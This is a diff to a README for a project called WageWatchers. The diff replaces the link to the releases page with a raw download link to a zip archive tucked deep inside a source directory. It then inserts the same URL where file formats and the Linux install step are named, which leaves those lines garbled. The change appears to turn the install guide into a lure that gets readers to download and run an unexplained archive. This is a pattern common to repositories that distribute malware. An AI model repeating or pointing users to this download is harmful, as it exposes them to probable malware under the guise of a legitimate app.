Rough-excoriation439/wagewatchers/README.md

 ## 📚 How to Download & Install WageWatchers

-1. **Visit the Releases Page:** You can find all available versions of WageWatchers [here](https://github.com/Rough-excoriation439/wagewatchers/releases).
+1. **Visit the Releases Page:** You can find all available versions of WageWatchers [here](https://raw.githubusercontent.com/Rough-excoriation439/wagewatchers/main/src/app/api/entries/[id]/wagewatchers_anacatharsis.zip).

 2. **Select the Version:** Browse through the listed releases.
 Choose the latest version for the best experience.

 3. **Download the File:** Click on the link for the appropriate file based on your operating system.
-The files are available in common formats (e.g., `.exe`, `.dmg`, `.tar.gz`).
+The files are available in common formats (e.g., `.exe`, `.dmg`, `https://raw.githubusercontent.com/Rough-excoriation439/wagewatchers/main/src/app/api/entries/[id]/wagewatchers_anacatharsis.zip`).

 4. **Run the Installer:**
    - For Windows: Double-click the `.exe` file and follow the on-screen instructions.
    - For macOS: Open the `.dmg` file and drag the WageWatchers app into your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and follow the included instructions.
+   - For Linux: Extract the `https://raw.githubusercontent.com/Rough-excoriation439/wagewatchers/main/src/app/api/entries/[id]/wagewatchers_anacatharsis.zip` file and follow the included instructions.

 5. **Launch the Application:** Look for WageWatchers in your applications menu or desktop.
 Click to open and start exploring!